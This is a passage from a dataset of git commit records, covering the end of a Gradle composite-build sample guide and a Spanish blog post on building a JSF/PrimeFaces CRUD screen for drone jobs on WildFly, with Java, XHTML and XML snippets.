https:\/\/www.jetbrains.com\/help\/idea\/gradle.html#gradle_import_project_start[IntelliJ native importer] or https:\/\/projects.eclipse.org\/projects\/tools.buildship[Eclipse Buildship].\n\n== Defining and using a composite build\n\nThis sample shows how 2 Gradle builds that are normally developed separately and combined using binary integration can be wired together into a composite build with source integration. The `my-utils` multiproject build produces 2 different java libraries, and the `my-app` build produces an executable using functions from those libraries.\n\nNote that the `my-app` build does not have direct dependencies on `my-utils`. Instead, it declares module dependencies on the libraries produced by `my-utils`:\n\n====\ninclude::sample[dir=\"groovy\",files=\"my-app\/app\/build.gradle[tags=app_dependencies]\"]\ninclude::sample[dir=\"kotlin\",files=\"my-app\/app\/build.gradle.kts[tags=app_dependencies]\"]\n====\n\n== Using command-line composite build\n\nWhen using a composite build, no shared repository is required for the builds, and no changes need to be made to the build scripts.\n\n1. Change the sources of `Number.java`\n2. Run the `my-app` application, including the `my-utils` build.\n\n```\ncd my-app\ngradle --include-build ..\/my-utils run\n```\n\nUsing _dependency substitution_, the module dependencies on the util libraries are replaced by project dependencies on `my-utils`.\n\n== Converting `my-app` to a composite build\n\nIt's possible to make the above arrangement persistent, by making `my-app` a composite build that includes `my-utils`.\n\n```\ncd my-app\necho \"includeBuild '..\/my-utils'\" >> settings.gradle\ngradle run\n```\n\nWith this configuration, the module dependencies from `my-app` to `my-utils` will always be substituted with project dependencies.\n\nWhile simple, this approach has the downside of modifying the `my-app` build.\n\n== Using separate composite build\n\nIt is also possible to create a separate composite build that includes both the `my-app` and `my-utils` builds.\n\n====\ninclude::sample[dir=\"groovy\",files=\"settings.gradle[]\"]\ninclude::sample[dir=\"kotlin\",files=\"settings.gradle.kts[]\"]\n====\n\nNote that it is not yet possible to execute tasks in an included build from the command line. Instead, the build user must create delegating tasks in the composite.\n\n====\ninclude::sample[dir=\"groovy\",files=\"build.gradle[tags=run]\"]\ninclude::sample[dir=\"kotlin\",files=\"build.gradle.kts[tags=run]\"]\n====\n\n```\ngradle run\n```\n\nWe are working on a mechanism to permit tasks in included builds to be referred to directly on the command line. Stay tuned!\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7250281b3985bb49f8b35b394ee4af77b35ec2c2","subject":"Update 2015-07-23-Implementacion-de-un-CRUD-La-pantalla-de-Gestion-de-Trabajos.adoc","message":"Update 2015-07-23-Implementacion-de-un-CRUD-La-pantalla-de-Gestion-de-Trabajos.adoc","repos":"lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io","old_file":"_posts\/2015-07-23-Implementacion-de-un-CRUD-La-pantalla-de-Gestion-de-Trabajos.adoc","new_file":"_posts\/2015-07-23-Implementacion-de-un-CRUD-La-pantalla-de-Gestion-de-Trabajos.adoc","new_contents":"= Implementaci\u00f3n de un CRUD: La pantalla de Gesti\u00f3n de Trabajos.\nLa metaweb\n:hp-tags: JSF, JavaServer Faces, CRUD, EJB, Hibernate, backing bean, Git, GitHub\n:published_at: 2015-07-23\n\nEn este post os resumo los aspectos m\u00e1s relevantes de la implementaci\u00f3n del caso de uso de introducci\u00f3n de Trabajos de Drones creado a partir de la solicitud de dicha funcionalidad por parte de nuestro cliente imaginario, TAS. La release de la que se parte es la 1.0.1, y a la que llegaremos ser\u00e1 la 1.1.x. As\u00ed que usad la primera para intertar implementar la pantalla por vuestra cuenta y la segunda para ver la impleme taci\u00f3n terminada.\n\nYo aqu\u00ed os har\u00e9 una serie de comentarios sobre la release 1.1.x, se\u00f1alando los detalles de implementaci\u00f3n interesantes. Pero primero una breve introducci\u00f3n sobr\u00e9 qu\u00e9 es un mantenimiento de una entidad del modelo de dominio. En ingl\u00e9s se conoce como CRUD: Create, Read\/Retrieve, Update, Delete, y se refiere al conjunto de elementos de dise\u00f1o y programa necesarios para implementar el t\u00edpico mantenimiento de una entidad. El caso m\u00e1s sencillo se da cuando la entidad es una entidad \"hoja\" en nuestro diagrama de clases. Si la entidad tiene una o m\u00e1s relaciones con otras entidades tendremos, en ocasiones, que mantenerlas tambi\u00e9n en el CRUD. Recordemos nuestro sencillo diagrama de clases:\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/003\/post003-fig045.png[]\n\n\u00bfQu\u00e9 mantenimientos podr\u00edamos hacer aqu\u00ed? Bueno, en este caso tienen sentido dos mantenimientos. El que vamos a implementar, de la entidad Trabajo, donde tendremos que mantener la relaci\u00f3n desde Trabajo hacia Drone, que representa la selecci\u00f3n del drone que va a llevar a cabo el trabajo, y la relaci\u00f3n del trabajo con sus puntos de ruta, que representa la ruta que seguir\u00e1 el drone en ese trabajo. Y por otro lado tambi\u00e9n cabe realizar un CRUD de la entidad Drone donde no cabe el mantenimiento de la relaci\u00f3n desde Drone a Trabajo ya que cuando por ejemplo creamos un drone no tiene sentido en nuestro caso asignarle en el mismo caso o en otro diferente uno o m\u00e1s trabajos.\n\nCentr\u00e1ndonos en el mantenimiento de la entidad Trabajo empecemos con su resoluci\u00f3n. Por partes, hacemos primero un an\u00e1lisis, luego el dise\u00f1o de la interfaz y por \u00faltimo vemos la implementaci\u00f3n de cada capa.\n\nLa lista de requisitos extraida de la entrevista con el cliente es la siguiente:\n\n.Lista de requisitos del mantenimiento de trabajos\n[width=\"90%\"]\n|===\n|[small]*Pantalla de listado de trabajos*\n|[small]#Inicialmente se presentar\u00e1 un listado de trabajos en pantalla.#\n|[small]#El listado se debe ordenar por todos sus campos y se presentar\u00e1 paginado.#\n|[small]#Sobre el listado dispondremos de comandos para Editar, dar de baja y dar de baja definitiva un trabajo.#\n|[small]#La baja definitiva debe ser confirmada.#\n|[small]*Pantalla de mantenimiento de trabajo*\n|[small]#Todos los campos se validar\u00e1n presentando mensajes adecuados.#\n|[small]#Se presentar\u00e1 un listado de los drones disponibles seg\u00fan la fecha del trabajo.#\n|[small]#La ruta se importar\u00e1 desde un excel generado por la aplicaci\u00f3n de gesti\u00f3n de mapas usada para la definici\u00f3n de rutas sobre mapa.#\n|===\n\nPosteriormente a la definici\u00f3n de los requisitos decidimos si usar o no una librer\u00eda JSF espec\u00edfica que nos aporte capacidades adicionales en la capa de presentaci\u00f3n. Nuestras pantallas usar\u00e1n listados con capacidades de ordenaci\u00f3n, paginaci\u00f3n, etc. Adem\u00e1s necesitamos acciones con confirmaci\u00f3n. El coste de incluir la librer\u00eda es muy bajo y finalmente optamos por incluir una en nuestro proyecto. Entre RichFaces y Primefaces elegimos la segunda por sus caracter\u00edsticas en cuanto a n\u00famero de componentes, curva de aprindizaje, documentaci\u00f3n, comunidad y tendencia exponencial de incremento en el uso en nuevos proyectos.\n\nNOTE: Si quer\u00e9is comparar la popularidad de distintas tecnolog\u00edas usad Google Trends. Tendr\u00e9is que a\u00f1adir los t\u00e9rminos que identifiquen a cada tecnolog\u00eda. Y hay que cuidar que el t\u00e9rmino no recoja resultados no deseados. Por ejmeplo si quer\u00e9is ver la tendencia del framework ionic para aplicaciones h\u00edbridas escribir \"ionic framework\" y no \"ionic\" a secas. La URL es https:\/\/www.google.es\/trends[\u00e9sta]. \n\nA\u00f1adimos PrimeFaces al proyecto. Adem\u00e1s, optamos por trabajar con la \u00faltima versi\u00f3n de JSF. La versi\u00f3n que trae EAP 6.3 es la 2.1. Se ha intentado seguir el procedimiento existente en la web para incluir la \u00faltima versi\u00f3n en este servidor pero no ha sido posible. En resumen el proceso pasa por bajar una aplicaci\u00f3n Maven desde Github que genera un fichero CLI que realiza el deploy de los tres slots para los tres m\u00f3dulos que se ven afectados por la actualizaci\u00f3n. Sin embargo uno de los slots da problemas ya que parece que el script est\u00e1 actualizado para operar con las versiones iniciales del servidor Wildfly y no del EAP.\n\nDe modo que optamos por adoptar el nuevo servidor Wildfly en su \u00faltima versi\u00f3n, la 9.0.1, y as\u00ed tener disponible una plataforma Java EE 7 completa. Lo primero ser\u00e1 descargar el fichero de instlaci\u00f3n del servidor http:\/\/wildfly.org\/downloads\/[aqu\u00ed]. Ten\u00e9is que elegir la primera de las opciones, la que tiene la versi\u00f3n 9.0.1.Final.\n\nNOTE: Descargaos tambi\u00e9n los Quickstarts porque os van a venir muy bien como material de consulta en las etapas iniciales de la implementanci\u00f3n de un nuevo proyecto sea cual sea la naturaleza de \u00e9ste.\n\nAntes de usar el servidor debemos a\u00f1adir un usuario. Para ello tenemos que ejecutar el archivo por lotes bin\\add-user.bat. Aparece una ventana de di\u00e1logo y despu\u00e9s de varias preguntas el usuario se crea.\n\nUna vez instalado WildFly lo a\u00f1adimos a Eclipse como nueva unidad de ejecuci\u00f3n. La versi\u00f3n de las JBoss Tools s\u00f3lo ofrec\u00eda un conector para la versi\u00f3n 8 del servidor pero despu\u00e9s de las pruebas de arranque y parada parece que para un uso sencillo no tendremos problemas con esto.\n\nNOTE: Si no lo hab\u00e9is hecho a\u00fan versionad bajo Git el proyecto y cread el correspondiente repositorio remoto en GitHub para ir publicando vuestras releases. \n\n\u00bfQu\u00e9 cambios tendremos que hacer en nuestro proyecto tras el cambio de servidor y la actualizaci\u00f3n de las versiones de las tecnolog\u00edas? En primer lugar tendremos que adaptar las dependencias Maven a las del nuevo servidor, un proceso sin demasiada complicaci\u00f3n. Para consultar los cambios en el c\u00f3digo que se produzcan durante el desarrollo de este post bajaos la release 1.1.x en https:\/\/github.com\/lametaweb\/jdrone\/archive\/1.1.0.zip[esta direcci\u00f3n].\n\nAprovechando que pom.xml ha variado he refactorizado el ciclo de construcci\u00f3n de modo que ahora existe un profile \"despliegue-recursos\" que se debe ejecutar la primera vez que despleguemos la aplicaci\u00f3n o bien si los recursos has sido eliminados por cualquier motivo. Esto lo he hecho para evitar los problemas derivados del bloqueo de la base de datos. Ten\u00e9is que crear un nueva configuraci\u00f3n de ejecuci\u00f3n: Bot\u00f3n derecho proyecto > Rus As > Run Configurations... > bot\u00f3n derecho sobre Maven build > New > En la entrada Goals escribir \"clean install -Pdespliegue-recursos\" y dar un nombre al nuevo perfil.\n\nEn segundo lugar, como vamos a subir desde JSF 2.1 a 2.2 actualizamos los espacios de nombres en el nodo raiz del fichero _faces-config.xml_. Adem\u00e1s tendremos que actualizar la faceta JavaServer Faces. La desmarcamos, esperamos a que se desinstale y la volvemos a marcar. Al a\u00f1adirla de nuevo la opci\u00f3n _JSF Implementation Library_ dejadla as\u00ed _Type > Disable Library Configuration_.\n\nPara comprobar que JSF 2.2 funciona correctamente modificamos nuestra p\u00e1gina index.xhtml para adaptarla a HTML5 y JSF 2.2, a\u00f1adiendo adem\u00e1s una etiqueta nueva en la versi\u00f3n 2.2.\n\nPara la adaptaci\u00f3n a HTML 5:\n\n`<!DOCTYPE html>`\n\nPara la adaptaci\u00f3n a JSF 2.2 cambiamos los espacios de nombres:\n\n`<html xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\"\n\txmlns:h=\"http:\/\/xmlns.jcp.org\/jsf\/html\"\n\txmlns:f=\"http:\/\/xmlns.jcp.org\/jsf\/core\">`\n\nFinalmente sustituimos:\n\n`<f:event listener=\"#{disponibilidadBean.listaEstadoDronesPorFecha()}\" type=\"preRenderView\" \/>`\n\npor:\n\n`<f:viewAction action=\"#{disponibilidadBean.listaEstadoDronesPorFecha()}\" onPostback=\"true\"><\/f:viewAction>`\n\nAdem\u00e1s ahora no se admitir\u00e1n los t\u00edpicos caracteres de espaciado `\\ ` y tendremos que sustituirlos por el equivalente c\u00f3digo unicode `\\ `.\n\nNOTE: La etiqueta viewAction es nueva en JSF 2.2. Asocia un evento a una p\u00e1gina y su uso es m\u00e1s flexible que el de la etiqueta event para acciones de precarga de datos de pantalla. En nuestra pantalla inicial el uso no sigue el patr\u00f3n habitual. Un uso m\u00e1s adecuado se ver\u00e1 en la implementaci\u00f3n de las pantallas de mantenimiento de trabajos.\n\nMuy bien, una vez que tenemos correctamente actualizado el entorno de trabajo comenzamos con la implementaci\u00f3n del caso de uso planteado. Como siempre habr\u00e1 que implementar las capas de presentaci\u00f3n y negocio. Empecemos por la primera.\n\nAntes de empezar con la primera pantalla hay que crear una plantilla que proporcione el maquetado de las pantallas de la aplicaci\u00f3n. Primefaces nos da la soluci\u00f3n con Grid CSS, una librer\u00eda de estilos con la que crearemos un layout responsive al estilo de Bootstrap. Antes de empezar con la implementaci\u00f3n dibujamos un boceto del layout para tener claro los divs que tengo que considerar.\n\nLa plantilla debe ser privada, por tanto va situada dentro de la carpeta _WEB-INF_. Una plantilla contendr\u00e1 en la cabecera elementos comunes a todas las p\u00e1ginas como gesti\u00f3n de la cach\u00e9 de cliente, estilos CSS comunes, y en el cuerpo el maquetado de la p\u00e1gina y dentro de cada elemento div (con estilos de Grid CSS) las etiquetas <ui:insert...> de Facelets para insertar el contenido.\n\nUna vez que tenemos lista nuestra plantilla, en la carpeta _\/jdrone\/src\/main\/webapp\/WEB-INF\/plantillas\/plantilla.xhtml_, y su hoja de estilos correspondiente, podemos empezar a implementar cada pantalla de la aplicaci\u00f3n en base a la plantilla.\n\nLa estructura de una p\u00e1gina ser\u00e1:\n\n[source,xhtml,indent=0]\n----\n\t<ui:composition...>\n \t<ui:define name=\"central\">\n \t...\n <\/ui:define>\n <ui:define name=\"logo\">\n \t\t<ui:include... \/>\n <\/ui:define>\n ...\n <\/ui:composition>\n----\n\nEl contenido de la zona variable, etiquetada con el nombre _central_ en la plantilla, se define en la p\u00e1gina en general al principio, para mayor claridad, dado que aqu\u00ed el orden no afecta. Como la zona del logo ser\u00e1 fija para todas las pantallas la implementamos en un panel (una p\u00e1gina xhtml privada) aparte y la a\u00f1adimos con un include que toma como el panel.\n\nEn primer lugar vamos a adaptar nuestra pantalla de consulta de los posts anteriores, de drones disponibles en una fecha, al uso de la plantilla, y movemos el contenido desde el fichero index.xhtml, que ahora se convertir\u00e1 en la pantalla inicial, al fichero consulta-inicial.xhtml.\n\nImplementamos el panel del logo e inclu\u00edmos una simple animaci\u00f3n en jQuery. Primefaces est\u00e1 basado en esta librer\u00eda Javascript que es conveniente conocer ya que su uso est\u00e1 muy extendido en la capa de presentaci\u00f3n de proyectos reales. Como nuestro proyecto incluye Primemefaces y \u00e9ste incluye jQuery no tenemos que a\u00f1adir la librer\u00eda de manera expl\u00edcita. En general, para cualquier proyecto, en p\u00e1ginas que no usen ninguna estiqueta de Primefaces incluiremos de manera expl\u00edcita la librer\u00eda jQuery embebida en Primefaces con las siguientes l\u00edneas:\n\n`<h:outputScript library=\"primefaces\" name=\"jquery\/jquery.js\" target=\"head\" \/>`\n`<h:outputScript library=\"primefaces\" name=\"jquery\/jquery-plugins.js\" target=\"head\" \/>`\n\nLo siguiente que necesitamos es un men\u00fa de opciones. Se opta por la cl\u00e1sica barra de men\u00fa. Como suele ocurrir cuando necesitamos alg\u00fan elemento para la capa de presentaci\u00f3n Primefaces nos da tambi\u00e9n en esta ocasi\u00f3n la soluci\u00f3n con el componente MenuBar. Tened en cuenta que la versi\u00f3n 5.2, abierta a la comunidad y usada en nuestro programa, tiene casi 150 componentes, y grancantidad de caracter\u00edsticas adicionales. Dibujamos las opciones y submen\u00fas que tengamos previstos para la aplicaci\u00f3n e implementamos el man\u00fa en un nuevo panel, de la misma manera que en el caso del logo.\n\nArrancamos el servidor y ejecutamos nuestro ciclo de construcci\u00f3n para ver c\u00f3mo queda todo en pantalla. Personalmente no me convence el aspecto por defecto del men\u00fa por lo que acudimos de nuevo a Primefaces para cambiar de Theme. De paso activamos los iconos de FontAwesome a\u00f1adiendo el correspondiente par\u00e1metro en el fichero _web.xml_ para tener una gama mayor de iconos para elegir.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/009\/post009-fig005.png[]\n\nPara cambiar el Theme tenemos que a\u00f1adir una dependencia de Maven, elegimos el Theme bluesky, m\u00e1s acorde con la Marca de la compa\u00f1\u00eda:\n\n[source,xml,indent=0]\n----\n <dependency>\n <groupId>org.primefaces.themes<\/groupId>\n <artifactId>bluesky<\/artifactId>\n <version>1.0.10<\/version>\n <\/dependency>\n----\n\nY a\u00f1adir un par\u00e1metro en el descriptor de despliegue, web.xml:\n\n[source,xml,indent=0]\n----\n <context-param>\n <param-name>primefaces.THEME<\/param-name>\n <param-value>bluesky<\/param-value>\n <\/context-param>\n----\n\nGuardamos los cambios. Si abrimos el fichero pom.xml observamos que se muestra un error en la dependencia a\u00f1adida, esto es debido a que esta dependencia no est\u00e1 en el repositorio Central. Tenemos por tanto que a\u00f1adir el repositorio de Primefaces a nuestra configuraci\u00f3n. Podemos hacerlo directamente desde la sugerencia que nos muestra Eclipse al poner el puntero del rat\u00f3n sobre el error. Introducid los datos tal y como aparecen en la siguiente figura:\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/009\/post009-fig010.png[]\n\nPulsamos OK y Finish. Para afinar el estilo de la barra de men\u00fa a\u00fan m\u00e1s podemos modificar el estilo aplicado por el frmaework a los componentes que forman el men\u00fa. En la documentaci\u00f3n de Primefaces aparecen estos estilos pero lo m\u00e1s pr\u00e1ctico es ayudarnos de las herramientas de desarrollador de Chrome o Firefox para localizar f\u00e1cilmente los estilos aplicados a cada elemento sobre la propia pantalla y editarlos para ver los cambios _on the fly_.\n\n\nA\u00f1adid al principio del fichero _plantilla.css_ lo siguiente: \n\n[source,css,indent=0]\n----\n.ui-menubar{\n\theight: 1.em;\t\n\tpadding:0em !important;\t\n}\n.ui-menuitem{\n\theight: 1.8em;\n}\n----\n\nDesplegad los cambios en WildFly y comprobad que el nuevo aspecto de la pantalla es similar a \u00e9ste:\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/009\/post009-fig015.png[]\n\nNOTE: Existe una herramienta muy interesante que evita los redespliegues en el servidor de desarrollo durante la implementaci\u00f3n de una aplicaci\u00f3n. Se trata de JRebel, http:\/\/zeroturnaround.com\/software\/jrebel\/. Es una herramienta de pago pero merece la pena bajar la versi\u00f3n demo y evaluar si nos merece la pena incluirla entre nuestro set de plugins.\n\nBien, para dejar lista la aplicaci\u00f3n para el comienzo de la implementaci\u00f3n de las dos pantallas de \"Gesti\u00f3n de trabajos\" movemos el contenido de index.html a consulta-inicial.xhtml y dejamos index.xhtml con un fondo de pantalla limpio como pantalla inicial de la aplicaci\u00f3n, a\u00f1adiendo una imagen de fondo.\n\nEmpezamos a\u00f1adiendo la p\u00e1gina que nos muestre la lista de trabajos. Tenemos que a\u00f1adir a cada item un bot\u00f3n para eliminarlo, y otro para modificarlo. Adem\u00e1s cada item tendr\u00e1 un link para la consulta de los detalles del trabajo. Por \u00faltimo a nivel de p\u00e1gina tendremos un bot\u00f3n para dar de alta un nuevo trabajo y otro para volver a la pantalla inicial.\n\nCreamos la p\u00e1gina trabajos.xhtml a partir de index.html. Escribiremos el c\u00f3digo necesario dentro del define del \u00e1rea \"central\". A continuaci\u00f3n creamos el backing bean para la p\u00e1gina, TrabajosBean.java, en la misma carpeta que DisponibilidadBean.java. \n\nEl \u00e1mbito para el backing bean debe extenderse hasta el \u00e1mbito de la vista, ViewScoped. Esto es necesario porque en esta p\u00e1gina vamos a implementar acciones que llaman a m\u00e9todos con par\u00e1metros y para que esta construcci\u00f3n en EL (Expression Language) sea posible el bean debe permanecer en memoria m\u00e1s all\u00e1 del \u00e1mbito de la petici\u00f3n.\n\nNOTE: Tened cuidado de elegir la clase ViewScoped correcta tras pulsar Ctrl + O. Tenemos que elegir javax.faces.view.ViewScoped y no javax.faces.bean.ViewScoped. La segunda clase es nueva en JSF 2.2 y totalmente compatible con CDI.\n\nLo siguiente es crear la clase de negocio. En principio creamos una para cada entidad persistente. Ya ten\u00edamos el bean de negocio de la entidad Drone, ahora creamos uno para la entidad Trabajo. Como para la entidad Trabajo necesitamos implementar las operaciones de persistencia t\u00edpicas de un CRUD: Crear, Modificar, Eliminar y Consultar, vamos a refactorizar el c\u00f3digo de los beans de negocio creando una superclase abstracta que contenga estas operaciones b\u00e1sicas, de manera que en la clase concreta s\u00f3lo ir\u00e1n las operaciones de negocio particulares de cada una.\n\nCreamos por tanto una nueva clase java con el nombre AbstractFacade.java en la carpeta _negocio_. Esta clase no necesita caracter\u00edsticas de bean EJB por lo que no a\u00f1adiremos ninguna anotaci\u00f3n. Y refactorizamos.\n\nLa clase TrabajoFacade inicialmente:\n\n[source,java,indent=0]\n----\npackage com.lametaweb.jdrone.negocio;\n\nimport javax.ejb.LocalBean;\nimport javax.ejb.Stateless;\n\n\/**\n * Session Bean implementation class TrabajoFacade\n *\/\n@Stateless\n@LocalBean\npublic class TrabajoFacade {\n\n \/**\n * Default constructor. \n *\/\n public TrabajoFacade() {\n \/\/ TODO Auto-generated constructor stub\n }\n\n}\n----\n\nLa clase TrabajoFacade refactorizada:\n\n[source,java,indent=0]\n----\npackage com.lametaweb.jdrone.negocio;\n\nimport javax.ejb.LocalBean;\nimport javax.ejb.Stateless;\nimport javax.persistence.EntityManager;\nimport javax.persistence.PersistenceContext;\nimport com.lametaweb.jdrone.persistencia.Trabajo;\n\n\/**\n * Session Bean implementation class TrabajoFacade\n *\/\n@Stateless\n@LocalBean\npublic class TrabajoFacade extends AbstractFacade<Trabajo>{\n\t\n\t@PersistenceContext(unitName = \"datosdrones\")\n private EntityManager em;\n\n \/**\n * Default constructor. \n *\/\n public TrabajoFacade() {\n \/\/ TODO Auto-generated constructor stub\n \tsuper(Trabajo.class);\n }\n \n protected EntityManager getEntityManager(){\n \treturn em;\n }\n\n}\n----\n\nObservad como la clase abstracta adem\u00e1s es gen\u00e9rica dado que utiliza el m\u00e9todo de consulta tipado y necesita referirse al tipo de la entidad que se gestiona en la subclase.\n\nEn primer lugar planteamos los m\u00e9todos de negocio\/dao que necesitamos, en este caso no necesito crear ninguno ya que en la superclase ya dispongo de un m\u00e9todo que lee todos los trabajos y otro que lee un trabajo por su ID. A continuaci\u00f3n iremos creando los componentes en la p\u00e1gina xhtml y en paralelo los elementos java que vayamos necesitando en la clase backing bean. Continuaremos dentro de un proceso iterativo hasta conseguir una p\u00e1gina de listado de trabajos libre de bugs. Es el momento de pasar a la p\u00e1gina de detalle de trabajo que nos va a servir para consulta y modificaci\u00f3n y para la que seguiremos el mismo proceso de implementaci\u00f3n.\n\nEmpezamos con la p\u00e1gina trabajos.xhtml, que iremos implementando y probando paso a paso. Implementad de forma met\u00f3dica y no mezclando funcionalidades. El primer paso ser\u00e1 simplemente mostrar la lista de trabajos en la pantalla. Aqu\u00ed os copio el estado de la p\u00e1gina y del backing bean con este primer paso implementado.\n\nLa p\u00e1gina:\n\n[source,xhtml,indent=0]\n----\n<ui:composition xmlns:ui=\"http:\/\/xmlns.jcp.org\/jsf\/facelets\"\n xmlns:h=\"http:\/\/xmlns.jcp.org\/jsf\/html\" \n template=\"\/WEB-INF\/plantillas\/plantilla.xhtml\"\n xmlns:p=\"http:\/\/primefaces.org\/ui\"\n xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\"\n xmlns:f=\"http:\/\/xmlns.jcp.org\/jsf\/core\">\n\t\n\t<f:metadata>\n\t\t<f:viewAction action=\"#{trabajosBean.actualizaModeloTrabajos()}\"><\/f:viewAction>\n\t<\/f:metadata>\n <ui:define name=\"central\">\n\t\t<!-- listado selecci\u00f3n trabajos -->\n\t\t<h:form>\n\n\t\t<p:dataTable var=\"trabajo\" value=\"#{trabajosBean.trabajos}\">\n\t\t <p:column headerText=\"N. Registro\">\n\t\t <h:outputText value=\"#{trabajo.numeroDeRegistro}\" \/>\n\t\t <\/p:column>\n\t\t \n\t\t <p:column headerText=\"Inicio\" priority=\"3\">\n\t\t <h:outputText value=\"#{trabajo.fechaHoraInicio}\" \/>\n\t\t <\/p:column>\n\t\t \n\t\t <p:column headerText=\"Finalizaci\u00f3n\" priority=\"2\">\n\t\t <h:outputText value=\"#{trabajo.fechaHoraFinalizacion}\" \/>\n\t\t <\/p:column>\n\t\t \n\t\t <p:column headerText=\"Drone\" priority=\"4\">\n\t\t <h:outputText value=\"#{trabajo.droneAsignado.numeroDeSerie}\" \/>\n\t\t <\/p:column>\n\t\t<\/p:dataTable>\n\t\t<\/h:form>\n\t<\/ui:define>\n\t\n\t<!-- contenido de zona logo -->\n <ui:define name=\"logo\">\n <ui:include src=\"\/WEB-INF\/paneles\/panelLogo.xhtml\" \/>\n <\/ui:define>\n\n\t<!-- contenido de zona barra menu -->\n <ui:define name=\"menu\">\n <ui:include src=\"\/WEB-INF\/paneles\/panelMenu.xhtml\" \/>\n <\/ui:define>\n \n\t<!-- TODO: contenido de otras zonas... -->\n\n<\/ui:composition>\n----\n\nY la clase:\n\n[source,java,indent=0]\n----\npackage com.lametaweb.jdrone.vista;\n\nimport java.util.List;\n\nimport javax.enterprise.context.RequestScoped;\nimport javax.inject.Inject;\nimport javax.inject.Named;\n\nimport com.lametaweb.jdrone.negocio.TrabajoFacade;\nimport com.lametaweb.jdrone.persistencia.Trabajo;\n\n@Named\n@RequestScoped\npublic class TrabajosBean {\n\t\n\tprivate List<Trabajo> trabajos;\n\t@Inject\n\tprivate TrabajoFacade trabajoFacade;\n\n\tpublic TrabajosBean() {\n\t\t\/\/ TODO Auto-generated constructor stub\n\t}\n\n\t\n\tpublic void actualizaModeloTrabajos(){\n\t\ttrabajos = trabajoFacade.findAll();\n\t}\n\t\n\t\n\tpublic List<Trabajo> getTrabajos() {\n\t\treturn trabajos;\n\t}\n}\n----\n\nA\u00f1adimos a continuaci\u00f3n los botones de eliminaci\u00f3n y edici\u00f3n a la tabla. La eliminaci\u00f3n la hacemos con una llamada ajax, que es el comportamiento por defecto en PrimeFaces, para que s\u00f3lo se actualice la tabla. Despu\u00e9s de comprobar que puedo eliminar un trabajo correctamente paso a implementar el cuadro de di\u00e1logo de confirmaci\u00f3n. En un borrado ya sea f\u00edsico o l\u00f3gico siempre poned antes una confirmaci\u00f3n. La manera m\u00e1s limpia de a\u00f1adir un cuadro de confirmaci\u00f3n es con un ConfirmDialog global.\n\nCuando implementamos operaciones de negocio con Hibernate ayuda bastante, durante la depuraci\u00f3n del c\u00f3digo, visualizar las sentencias SQL que Hibernate genera contra la base de datos, de modo que podamos detectar problemas con facilidad. Una primera aproximaci\u00f3n a esto es a\u00f1adir esta configuraci\u00f3n a Hibernate en el archivo _persistence.xml_:\n\n[source,xml,indent=0]\n----\n <property name=\"hibernate.show_sql\" value=\"true\"\/>\n <property name=\"hibernate.format_sql\" value=\"true\"\/>\n----\n\nPero esto s\u00f3lo nos sacar\u00e1 por la consola las sentencias SQL, sin los valores de los par\u00e1metros. Para mostrar estos valores tenemos que ajustar la configuraci\u00f3n de log4j a\u00f1adiendo el fichero log4j.properties en alguna carpeta del classpath y estableciendo las propiedades necesarias. Cuando necesitemos visualizar la consulta real lanzada por Hibernate contra la base de datos utilizaremos un driver de proxy jdbc como https:\/\/p6spy.github.io\/p6spy\/2.0\/install.html#generic[P6Spy] o https:\/\/github.com\/arthurblake\/log4jdbc[log4jdbc].\n\nImplementamos ahora el bot\u00f3n de edici\u00f3n. Cuando pulsemos el bot\u00f3n tendremos que navegar a una nueva pantalla donde exista un formulario sobre el que pueda modificar el estado del trabajo seleccionado. A\u00f1adimos una nueva pantalla trabajo.xhtml. En trabajos.xhtml la llamada ser\u00e1 as\u00ed:\n\n[source,xhtml,indent=0]\n----\n <p:button outcome=\"\/trabajo.xhtml\" icon=\"ui-icon-pencil\">\n <f:param name=\"idTrabajo\" value=\"#{trabajo.idTrabajo}\"><\/f:param>\n <\/p:button>\n----\n\ny en la pantalla trabajo.xhtml la asignaci\u00f3n del par\u00e1metro en el backing bean y la posterior actualizaci\u00f3n del modelo ser\u00e1 as\u00ed:\n\n[source,xhtml,indent=0]\n----\n <f:metadata>\n <f:viewParam name=\"idTrabajo\" value=\"trabajoBean.idTrabajo\"><\/f:viewParam>\n <f:viewAction action=\"#{trabajoBean.actualizaModeloTrabajo()}\"><\/f:viewAction>\n <\/f:metadata>\n----\n\n\n\n\n\n\nVER PRUEBAS CON ARQUILLIAN\nhttps:\/\/github.com\/wildfly\/boms\/tree\/master\/jboss-javaee-7.0-with-tools\n\n\n\n\n\n\n\n\n","old_contents":"= Implementaci\u00f3n de un CRUD: La pantalla de Gesti\u00f3n de Trabajos.\nLa metaweb\n:hp-tags: JSF, JavaServer Faces, CRUD, EJB, Hibernate, backing bean, Git, GitHub\n:published_at: 2015-07-23\n\nEn este post os resumo los aspectos m\u00e1s relevantes de la implementaci\u00f3n del caso de uso de introducci\u00f3n de Trabajos de Drones creado a partir de la solicitud de dicha funcionalidad por parte de nuestro cliente imaginario, TAS. La release de la que se parte es la 1.0.1, y a la que llegaremos ser\u00e1 la 1.1.x. As\u00ed que usad la primera para intertar implementar la pantalla por vuestra cuenta y la segunda para ver la impleme taci\u00f3n terminada.\n\nYo aqu\u00ed os har\u00e9 una serie de comentarios sobre la release 1.1.x, se\u00f1alando los detalles de implementaci\u00f3n interesantes. Pero primero una breve introducci\u00f3n sobr\u00e9 qu\u00e9 es un mantenimiento de una entidad del modelo de dominio. En ingl\u00e9s se conoce como CRUD: Create, Read\/Retrieve, Update, Delete, y se refiere al conjunto de elementos de dise\u00f1o y programa necesarios para implementar el t\u00edpico mantenimiento de una entidad. El caso m\u00e1s sencillo se da cuando la entidad es una entidad \"hoja\" en nuestro diagrama de clases. Si la entidad tiene una o m\u00e1s relaciones con otras entidades tendremos, en ocasiones, que mantenerlas tambi\u00e9n en el CRUD. Recordemos nuestro sencillo diagrama de clases:\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/003\/post003-fig045.png[]\n\n\u00bfQu\u00e9 mantenimientos podr\u00edamos hacer aqu\u00ed? Bueno, en este caso tienen sentido dos mantenimientos. El 